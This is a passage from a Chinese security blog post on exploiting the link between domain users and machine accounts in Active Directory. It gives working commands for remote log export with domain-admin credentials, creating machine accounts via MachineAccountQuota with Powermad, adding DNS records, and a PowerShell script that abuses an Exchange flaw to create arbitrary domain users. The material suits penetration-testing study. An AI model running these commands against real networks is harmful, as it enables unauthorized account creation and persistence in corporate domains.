<span class="n">wevtutil</span> <span class="n">epl</span> <span class="n">Security</span> <span class="n">C</span><span class="p">:</span>\<span class="n">Users</span>\<span class="n">Administrator</span>\<span class="n">Desktop</span>\<span class="mf">1.</span><span class="n">evtx</span> <span class="o">/</span><span class="n">q</span><span class="p">:</span><span class="s2">&#34;*[System[(EventID=4624)] and EventData[Data[@Name=‘LogonType’]=&#39;3&#39;]]&#34;</span>
<span class="c1">#远程导出</span>
<span class="n">wevtutil</span> <span class="n">epl</span> <span class="n">Security</span> <span class="n">C</span><span class="p">:</span>\<span class="n">ProgramData</span>\<span class="n">dc</span><span class="o">.</span><span class="n">evtx</span> <span class="o">/</span><span class="n">q</span><span class="p">:</span><span class="s2">&#34;*[EventData[Data[@Name=&#39;LogonType&#39;]=&#39;3&#39;] and System[(EventID=4624) and TimeCreated[timediff(@SystemTime) &lt;= 2592000000]]]&#34;</span> <span class="o">/</span><span class="n">r</span><span class="p">:</span><span class="n">域控IP</span> <span class="o">/</span><span class="n">u</span><span class="p">:</span><span class="n">域管</span> <span class="o">/</span><span class="n">p</span><span class="p">:</span><span class="n">域管密码</span>
<span class="c1">#本地使用LogParser日志分析工具整理导出的日志，然后去除重复数据、无效数据（以$结束的用户名）</span>
<span class="n">LogParser</span><span class="o">.</span><span class="n">exe</span> <span class="o">-</span><span class="n">i</span><span class="p">:</span><span class="n">EVT</span> <span class="o">-</span><span class="n">o</span> <span class="n">log</span><span class="o">.</span><span class="n">csv</span> <span class="s2">&#34;SELECT TO_UPPERCASE(EXTRACT_TOKEN(Strings,5,&#39;|&#39;)) as USERNAME,TO_UPPERCASE(EXTRACT_TOKEN(Strings,18,&#39;|&#39;)) as SOURCE_IP FROM C:\ProgramData\log.evtx&#34;</span> <span class="o">&gt;</span> <span class="n">C</span><span class="p">:</span>\<span class="n">ProgramData</span>\<span class="n">log</span><span class="o">.</span><span class="n">log</span><span class="o">.</span><span class="n">csv</span>
<span class="c1">#对结果筛选</span>
<span class="n">dclog</span> <span class="n">cat</span> <span class="n">log</span><span class="o">.</span><span class="n">csv</span><span class="o">|</span><span class="n">grep</span> <span class="n">用户名</span><span class="o">|</span><span class="n">sort</span><span class="o">|</span><span class="n">uniq</span>
</code></pre></td></tr></table></div>
</div>
</div></li>
<li>
<p>当用户在公司内部使用outlook给攻击者发邮件的时候，可以在该邮件的头部看到该用户的内网IP。</p>
</li>
</ol>
<h2 id="机器账户"><a href="#机器账户" class="anchor-link">#</a><a href="#contents:机器账户" class="headings">机器账户</a></h2>
<p><strong>机器用户跟system用户的关系</strong></p>
<p><img src="/images/image-20210828220028051.png" alt=""></p>
<p>以WIN7这台机子为例，发现它是computer类的实例。而computer类的user类的子类。而域用户是user类的实例。而类是属性的集合，子类继承了父类的所有属性，因此域用户该有的属性，计算用户都有。甚至可以说，机器用户就是一种域用户。</p>
<p>本地用户SYSTEM就对应于域内的机器用户，在域内的用户名就是<code>机器名+$</code>。</p>
<h3 id="域用户添加机器用户"><a href="#域用户添加机器用户" class="anchor-link">#</a><a href="#contents:域用户添加机器用户" class="headings">域用户添加机器用户</a></h3>
<p>允许非特权用户通过ms-DS-MachineAccountQuota创建计算机帐户，默认为10个，但无法删除创建的计算机账户。创建者帐户的SID存储在计算机帐户的ms-DS-CreatorSID属性中。</p>
<p>添加计算机帐户将创建以下4个SPN</p>
<div class="highlight"><div class="chroma">
<div class="table-container"><table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash">HOST/MachineAccountName
HOST/MachineAccountName.domain.name
RestrictedKrbHost/MachineAccountName
RestrictedKrbhost/MachineAccountName.domain.name
</code></pre></td></tr></table></div>
</div>
</div><p>机器帐户没有本地登录权限，但可以通过<code>runas /netonly</code>执行命令。
Powermad利用ms-DS-MachineAccountQuota属性设置无需将实际系统附加到AD。</p>
<div class="highlight"><div class="chroma">
<div class="table-container"><table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c">#创建机器账户</span>
<span class="nb">Import-module</span> <span class="n">Powermad</span><span class="p">.</span><span class="n">ps1</span>
<span class="nb">New-MachineAccount</span> <span class="n">-MachineAccount</span> <span class="n">testAccount</span> <span class="n">-Password</span> <span class="p">$(</span><span class="nb">ConvertTo-SecureString</span> <span class="s2">&#34;123456789&#34;</span> <span class="n">-AsPlainText</span> <span class="n">-Force</span><span class="p">)</span> <span class="c">#或者不指定Password也可以</span>
<span class="c">#枚举所有计算机帐户(MachineAccount)的创建者</span>
<span class="nb">Get-MachineAccountCreator</span>
<span class="c">#[C#实现](&lt;https://github.com/pkb1s/SharpAllowedToAct&gt;)</span>
</code></pre></td></tr></table></div>
</div>
</div><p>这时候的账户还没有在DNS服务器里面注册</p>
<div class="highlight"><div class="chroma">
<div class="table-container"><table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c">#添加DNS记录</span>
<span class="nb">Invoke-DNSUpdate</span> <span class="n">-DNSType</span> <span class="n">A</span> <span class="n">-DNSName</span> <span class="n">testNew</span> <span class="n">-DNSData</span> <span class="n">192</span><span class="p">.</span><span class="n">168</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">111</span>
<span class="c">#删除此记录 (非特权用户无法修改或删除已有的记录)</span>
<span class="nb">Invoke-DNSUpdate</span> <span class="n">-DNSType</span> <span class="n">A</span> <span class="n">-DNSName</span> <span class="n">testNew</span>
</code></pre></td></tr></table></div>
</div>
</div><h3 id="机器用户添加域用户"><a href="#机器用户添加域用户" class="anchor-link">#</a><a href="#contents:机器用户添加域用户" class="headings">机器用户添加域用户</a></h3>
<div class="highlight"><div class="chroma">
<div class="table-container"><table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c">#需要下载ActiveDirectory模块</span>
<span class="nb">import-module</span> <span class="n">ActiveDirectory</span>
<span class="nv">$sd</span><span class="p">=</span> <span class="no">[System.DirectoryServices.ActiveDirectorySecurity]</span><span class="p">::</span><span class="n">new</span><span class="p">()</span>
<span class="nv">$sd</span><span class="p">.</span><span class="n">SetSecurityDescriptorSddlForm</span><span class="p">(</span><span class="s2">&#34;D:P(A;CI;GA;;;WD)&#34;</span><span class="p">,</span><span class="s2">&#34;Access&#34;</span><span class="p">)</span>
<span class="nv">$ba</span> <span class="p">=</span> <span class="nv">$sd</span><span class="p">.</span><span class="n">GetSecurityDescriptorBinaryForm</span><span class="p">()</span>
<span class="nv">$computer</span><span class="p">=</span><span class="nb">Get-ADComputer</span> <span class="n">-Identity</span> <span class="nv">$env:COMPUTERNAME</span>
<span class="nv">$ex</span><span class="p">=</span> <span class="nb">New-ADObject</span> <span class="n">-Name</span> <span class="s2">&#34;A&#34;</span> <span class="n">-Path</span> <span class="nv">$computer</span><span class="p">.</span><span class="n">DistinguishedName</span> <span class="n">-Type</span> <span class="s2">&#34;msExchStorageGroup&#34;</span> <span class="n">-OtherAttributes</span> <span class="p">@{</span><span class="n">nTSecurityDescriptor</span><span class="p">=</span><span class="nv">$ba</span><span class="p">}</span> <span class="n">-PassThru</span>
<span class="nv">$pwd</span> <span class="p">=</span> <span class="nb">ConvertTo-SecureString</span> <span class="n">-String</span> <span class="s2">&#34;qweasd.123&#34;</span> <span class="n">-AsPlainText</span> <span class="n">-Force</span>
<span class="nv">$user</span> <span class="p">=</span> <span class="nb">New-ADUser</span> <span class="n">-Name</span> <span class="s2">&#34;USERX&#34;</span> <span class="n">-Path</span> <span class="nv">$ex</span><span class="p">.</span><span class="n">DistinguishedName</span> <span class="n">-Enabled</span> <span class="nv">$true</span> <span class="n">-AccountPassword</span> <span class="nv">$pwd</span> <span class="n">-ChangePasswordAtLogon</span> <span class="nv">$false</span> <span class="n">-PassThru</span>
<span class="nb">Write-Host</span> <span class="s2">&#34;Created </span><span class="p">$(</span><span class="nv">$user</span><span class="p">.</span><span class="n">DistinguishedName</span><span class="p">)</span><span class="s2">&#34;</span>
</code></pre></td></tr></table></div>
</div>
</div><h2 id="参考"><a href="#参考" class="anchor-link">#</a><a href="#contents:参考" class="headings">参考</a></h2>
<ol>
<li><a href="https://www.anquanke.com/post/id/196510" target="_blank" rel="noopener">Windows内网协议学习LDAP篇之域用户和计算机用户介绍</a></li>
<li><a href="https://mp.weixin.qq.com/s?__biz=MzU0MDcyMTMxOQ==&amp;mid=2247484436&amp;idx=1&amp;sn=3948afd10b90bb8e29739f444778d462&amp;chksm=fb35addccc4224ca7906d07ec5053e33c2f70284e7546648ebb92ac1dffb65fa9a572d84e170&amp;cur_album_id=1939744561111613441&amp;scene=190#rd" target="_blank" rel="noopener">exchagne默认配置缺陷，域内任意新增域用户</a></li>
<li><a href="https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-%E5%9F%9F%E7%94%A8%E6%88%B7%E7%9A%84%E5%AF%86%E7%A0%81%E6%B0%B8%E4%B8%8D%E8%BF%87%E6%9C%9F%E5%B1%9E%E6%80%A7" target="_blank" rel="noopener">渗透基础--域用户的密码永不过期属性</a></li>
</ol>

            </div>

            
    
    
        <ul class="post-copyright">
            <li class="copyright-item author"><span class="copyright-item-text">作者</span>：<a href="https://myzxcg.com/" class="p-author h-card" target="_blank" rel="noopener">myzxcg</a></li>
            
                
                
                
                
                <li class="copyright-item link"><span class="copyright-item-text">链接</span>：<a href="/2021/08/%E5%9F%9F%E7%94%A8%E6%88%B7%E4%B8%8E%E5%9F%9F%E6%88%90%E5%91%98%E6%9C%BA%E5%99%A8%E5%85%B3%E7%B3%BB%E5%8F%8A%E5%88%A9%E7%94%A8/" target="_blank" rel="noopener">https://myzxcg.com/2021/08/域用户与域成员机器关系及利用/</a></li>
            
            <li class="copyright-item license"><span class="copyright-item-text">许可</span>：<a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank" rel="noopener">CC BY-NC-SA 4.0</a></li>
            
        </ul>
    



        </article>

        

        


        


        


        
    
    
        <div class="related-posts">
            <h2 class="related-title">相关文章：<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="icon related-icon"><path d="M256 8C119 8 8 119 8 256s111 248 248 248 248-111 248-248S393 8 256 8zm144 276c0 6.6-5.4 12-12 12h-92v92c0 6.6-5.4 12-12 12h-56c-6.6 0-12-5.4-12-12v-92h-92c-6.6 0-12-5.4-12-12v-56c0-6.6 5.4-12 12-12h92v-92c0-6.6 5.4-12 12-12h56c6.6 0 12 5.4 12 12v92h92c6.6 0 12 5.4 12 12v56z"/></svg></h2>
            <ul class="related-list">
                
                    <li class="related-item">
                        <a href="/2021/10/%E5%9F%9F%E5%A7%94%E6%B4%BE%E5%88%A9%E7%94%A8/" class="related-link">域委派利用</a>
                    </li>
                
                    <li class="related-item">
                        <a href="/2021/09/%E5%9F%9F%E7%94%A8%E6%88%B7%E5%8F%A3%E4%BB%A4%E7%AD%96%E7%95%A5%E4%B8%8E%E6%9A%B4%E7%A0%B4/" class="related-link">域用户口令策略与暴破</a>
                    </li>
                
                    <li class="related-item">
                        <a href="/2021/09/%E7%BB%84%E7%AD%96%E7%95%A5%E5%88%A9%E7%94%A8%E4%B8%8E%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/" class="related-link">组策略利用与横向移动</a>
                    </li>
                
                    <li class="related-item">
                        <a href="/2021/08/Windows%E8%AE%BF%E9%97%AE%E6%8E%A7%E5%88%B6%E6%A8%A1%E5%9E%8B-ACL%E5%88%86%E6%9E%90/" class="related-link">Windows访问控制模型--ACL分析</a>
                    </li>
                
                    <li class="related-item">
                        <a href="/2021/11/%E5%88%A9%E7%94%A8.NET-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%81%9A%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/" class="related-link">利用.NET 反序列化做权限维持</a>
                    </li>
                
            </ul>
        </div>
    



        


        
    <footer class="minimal-footer">
        
            <div class="post-tag"><a href="/tags/Windows/" rel="tag" class="post-tag-link">#windows</a> <a href="/tags/%E5%9F%9F%E7%9B%B8%E5%85%B3/" rel="tag" class="post-tag-link">#域相关</a></div>
        
        
        
            
        
    </footer>



        


        
    
        
        
    
    
    
    
        <ul class="post-nav">
            
                <li class="post-nav-prev">
                    <a href="/2021/09/%E7%BB%84%E7%AD%96%E7%95%A5%E5%88%A9%E7%94%A8%E4%B8%8E%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/" rel="prev">&lt; 组策略利用与横向移动</a>
                </li>
            
            
                <li class="post-nav-next">
                    <a href="/2021/08/Windows%E8%AE%BF%E9%97%AE%E6%8E%A7%E5%88%B6%E6%A8%A1%E5%9E%8B-ACL%E5%88%86%E6%9E%90/" rel="next">Windows访问控制模型--ACL分析 &gt;</a>
                </li>
            
        </ul>
    



        
    

        
            <div class="load-comments">
                <div id="load-comments">加载评论</div>
            </div>
        

        

        
            <div id="vcomments"></div>
        

        

        
    



    </div>
</main>


            
    <div id="back-to-top" class="back-to-top">
        <a href="#"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512" class="icon arrow-up"><path d="M34.9 289.5l-22.2-22.2c-9.4-9.4-9.4-24.6 0-33.9L207 39c9.4-9.4 24.6-9.4 33.9 0l194.3 194.3c9.4 9.4 9.4 24.6 0 33.9L413 289.4c-9.5 9.5-25 9.3-34.3-.4L264 168.6V456c0 13.3-10.7 24-24 24h-32c-13.3 0-24-10.7-24-24V168.6L69.2 289.1c-9.3 9.8-24.8 10-34.3.4z"/></svg></a>
    </div>


            
    <footer id="footer" class="footer">
        <div class="footer-inner">
            

            
    
        <ul class="socials"><li class="socials-item">
                    <a href="https://github.com/myzxcg" target="_blank" rel="external noopener" title="GitHub"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" class="icon social-icon"><path d="M12 .297c-6.63 0-12 5.373-12 12 0 5.303 3.438 9.8 8.205 11.385.6.113.82-.258.82-.577 0-.285-.01-1.04-.015-2.04-3.338.724-4.042-1.61-4.042-1.61C4.422 18.07 3.633 17.7 3.633 17.7c-1.087-.744.084-.729.084-.729 1.205.084 1.838 1.236 1.838 1.236 1.07 1.835 2.809 1.305 3.495.998.108-.776.417-1.305.76-1.605-2.665-.3-5.466-1.332-5.466-5.93 0-1.31.465-2.38 1.235-3.22-.135-.303-.54-1.523.105-3.176 0 0 1.005-.322 3.3 1.23.96-.267 1.98-.399 3-.405 1.02.006 2.04.138 3 .405 2.28-1.552 3.285-1.23 3.285-1.23.645 1.653.24 2.873.12 3.176.765.84 1.23 1.91 1.23 3.22 0 4.61-2.805 5.625-5.475 5.92.42.36.81 1.096.81 2.22 0 1.606-.015 2.896-.015 3.286 0 .315.21.69.825.57C20.565 22.092 24 17.592 24 12.297c0-6.627-5.373-12-12-12"/></svg></a>
                </li><li class="socials-item">
                    <a href="https://twitter.com/myzxcg" target="_blank" rel="external noopener" title="Twitter"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="icon social-icon"><path d="M459.37 151.716c.325 4.548.325 9.097.325 13.645 0 138.72-105.583 298.558-298.558 298.558-59.452 0-114.68-17.219-161.137-47.106 8.447.974 16.568 1.299 25.34 1.299 49.055 0 94.213-16.568 130.274-44.832-46.132-.975-84.792-31.188-98.112-72.772 6.498.974 12.995 1.624 19.818 1.624 9.421 0 18.843-1.3 27.614-3.573-48.081-9.747-84.143-51.98-84.143-102.985v-1.299c13.969 7.797 30.214 12.67 47.431 13.319-28.264-18.843-46.781-51.005-46.781-87.391 0-19.492 5.197-37.36 14.294-52.954 51.655 63.675 129.3 105.258 216.365 109.807-1.624-7.797-2.599-15.918-2.599-24.04 0-57.828 46.782-104.934 104.934-104.934 30.213 0 57.502 12.67 76.67 33.137 23.715-4.548 46.456-13.32 66.599-25.34-7.798 24.366-24.366 44.833-46.132 57.827 21.117-2.273 41.584-8.122 60.426-16.243-14.292 20.791-32.161 39.308-52.628 54.253z"/></svg></a>
                </li><li class="socials-item">
                    <a href="mailto:myz.xcg@gmail.com" target="_blank" rel="external noopener" title="Email"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="icon social-icon"><path d="M464 64H48C21.49 64 0 85.49 0 112v288c0 26.51 21.49 48 48 48h416c26.51 0 48-21.49 48-48V112c0-26.51-21.49-48-48-48zm0 48v40.805c-22.422 18.259-58.168 46.651-134.587 106.49-16.841 13.247-50.201 45.072-73.413 44.701-23.208.375-56.579-31.459-73.413-44.701C106.18 199.465 70.425 171.067 48 152.805V112h416zM48 400V214.398c22.914 18.251 55.409 43.862 104.938 82.646 21.857 17.205 60.134 55.186 103.062 54.955 42.717.231 80.509-37.199 103.053-54.947 49.528-38.783 82.032-64.401 104.947-82.653V400H48z"/></svg></a>
                </li><li class="socials-item">
                    <a href="/rss.xml" target="_blank" rel="external noopener" title="RSS"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" class="icon social-icon"><path d="M19.199 24C19.199 13.467 10.533 4.8 0 4.8V0c13.165 0 24 10.835 24 24h-4.801zM3.291 17.415c1.814 0 3.293 1.479 3.293 3.295 0 1.813-1.485 3.29-3.301 3.29C1.47 24 0 22.526 0 20.71s1.475-3.294 3.291-3.295zM15.909 24h-4.665c0-6.169-5.075-11.245-11.244-11.245V8.09c8.727 0 15.909 7.184 15.909 15.91z"/></svg></a>
                </li></ul>
    


            <div class="site-info">©&nbsp;2021&nbsp;myzxcg&nbsp;| Powered by <a href="https://github.com/reuixiy/hugo-theme-meme" target="_blank" rel="noopener">MemE</a>
              </div>

            
        </div>
    </footer>


        </div>
        

        






    

        

        
            <script>
    function loadComments() {
        if (typeof Valine === 'undefined') {
            var getScript = (options) => {
                var script = document.createElement('script');
                script.defer = true;
                script.crossOrigin = 'anonymous';
                Object.keys(options).forEach((key) => {
                    script[key] = options[key];
                });
                document.body.appendChild(script);
            };
            getScript({
                src: '//unpkg.com/valine@latest/dist/Valine.min.js',
                onload: () => {
                    newValine();
                }
            });
        } else {
            newValine();
        }
    }
    function newValine() {
        new Valine({
            el: '#vcomments',
            appId: '6Fu9AJHglaqmAVjpYMdOOBEi-MdYXbMMI',
            appKey: '0GcKEskKSnNfqn5dbNITfO4H',
            placeholder: '有问题欢迎交流',
            path: location.pathname,
            avatar: 'mp',
            meta: ["nick","mail","link"],
            pageSize:  10 ,
            lang: 'zh-cn',
            visitor:  false ,
            highlight:  true ,
            avatarForce:  false ,
            recordIP:  true ,
            serverURLs: '',
            emojiCDN: '',
            emojiMaps: {},
            enableQQ:  false ,
            requiredFields: []
        });
    }
</script>

        

        

        

    



    <script src="https://cdn.jsdelivr.net/npm/medium-zoom@latest/dist/medium-zoom.min.js"></script>

<script>
    let imgNodes = document.querySelectorAll('div.post-body img');
    imgNodes = Array.from(imgNodes).filter(node => node.parentNode.tagName !== "A");

    mediumZoom(imgNodes, {
        background: 'hsla(var(--color-bg-h), var(--color-bg-s), var(--color-bg-l), 0.95)'
    })
</script>




    <script src="https://cdn.jsdelivr.net/npm/instant.page@5.1.0/instantpage.min.js" type="module" defer></script>







    </body>
</html>
